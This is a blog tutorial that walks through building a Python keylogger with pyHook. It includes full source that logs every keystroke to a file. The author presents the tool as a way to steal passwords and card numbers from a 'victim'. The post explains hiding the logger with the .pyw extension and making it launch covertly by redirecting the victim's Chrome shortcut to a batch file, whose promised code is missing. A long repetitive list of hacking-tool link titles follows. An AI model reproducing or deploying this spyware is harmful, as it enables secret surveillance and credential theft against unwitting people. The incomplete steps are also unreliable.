Saturday, August 29, 2020

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Related posts


  1. Hackrf Tools
  2. How To Make Hacking Tools
  3. Ethical Hacker Tools
  4. Best Hacking Tools 2019
  5. Hacker Tool Kit
  6. Hack Tools For Games
  7. Pentest Tools Windows
  8. Hacking Tools 2019
  9. Hack Tools Online
  10. Hack Rom Tools
  11. Hacking Tools Windows 10
  12. Pentest Tools Port Scanner
  13. Pentest Automation Tools
  14. Hacker Tools Hardware
  15. Hacker Tools Linux
  16. Android Hack Tools Github
  17. Hacker Tools Mac
  18. Pentest Tools Open Source
  19. Computer Hacker
  20. Hack Apps
  21. Kik Hack Tools
  22. Hack Tool Apk No Root
  23. Hackers Toolbox
  24. How To Make Hacking Tools
  25. Pentest Tools Website Vulnerability
  26. Hacker Tools 2019
  27. Hack Tools For Games
  28. Hacker
  29. Hackers Toolbox
  30. Hack And Tools
  31. Hacking Tools For Games
  32. Pentest Tools Github
  33. Pentest Tools Bluekeep
  34. Pentest Reporting Tools
  35. Hacker Tools Apk
  36. Easy Hack Tools
  37. Free Pentest Tools For Windows
  38. Hacking Tools Mac
  39. Hacking Tools Kit
  40. Hacker Tools Github
  41. Pentest Tools For Ubuntu
  42. Hacking Tools Hardware
  43. Nsa Hacker Tools
  44. Wifi Hacker Tools For Windows
  45. Hacker Tools Free Download
  46. Hacking Tools For Games
  47. New Hack Tools
  48. Hack Tools Pc
  49. Hacker Search Tools
  50. Bluetooth Hacking Tools Kali
  51. Hacker Tools Apk
  52. Hacking Tools Windows 10
  53. Beginner Hacker Tools
  54. Hacker Tools Free
  55. Hack Website Online Tool
  56. Hack Tools Mac
  57. Pentest Tools For Android
  58. Hacking Tools Download
  59. Hacker
  60. Github Hacking Tools
  61. Pentest Tools Alternative
  62. Hack Tools For Windows
  63. Hacking Tools Software
  64. Pentest Tools Download
  65. Pentest Tools Linux
  66. New Hack Tools
  67. Hacking Tools Hardware
  68. Hacking Tools And Software
  69. Hackrf Tools
  70. Hacker Tools Github
  71. Hacking Tools Windows 10
  72. Hacking Tools Usb
  73. New Hacker Tools
  74. Hack Tools Github
  75. Wifi Hacker Tools For Windows
  76. Hacker Search Tools
  77. Hacking Tools Download
  78. Hack Tools Pc
  79. Pentest Tools Open Source
  80. Hacker Tools For Mac
  81. Pentest Tools
  82. Hack Tools For Ubuntu
  83. Hak5 Tools
  84. Hacker Tools Free
  85. Black Hat Hacker Tools
  86. Hack Tools For Ubuntu
  87. Hacking Apps
  88. Hacker Tools Free Download
  89. Hacker Tools For Ios
  90. Hack Apps
  91. Pentest Tools List
  92. Hack Tools 2019
  93. What Is Hacking Tools
  94. Pentest Box Tools Download
  95. Hacker Tools Github
  96. Hacking Apps
  97. Wifi Hacker Tools For Windows
  98. Hacking Tools Software
  99. How To Make Hacking Tools
  100. Hacking Apps
  101. Hack And Tools
  102. Hacking Tools
  103. Hacker Tools Free Download
  104. Hack Rom Tools
  105. Hacker Tools Free
  106. Hacking Tools Download
  107. Termux Hacking Tools 2019
  108. Hacker Tools For Mac

No comments:

Post a Comment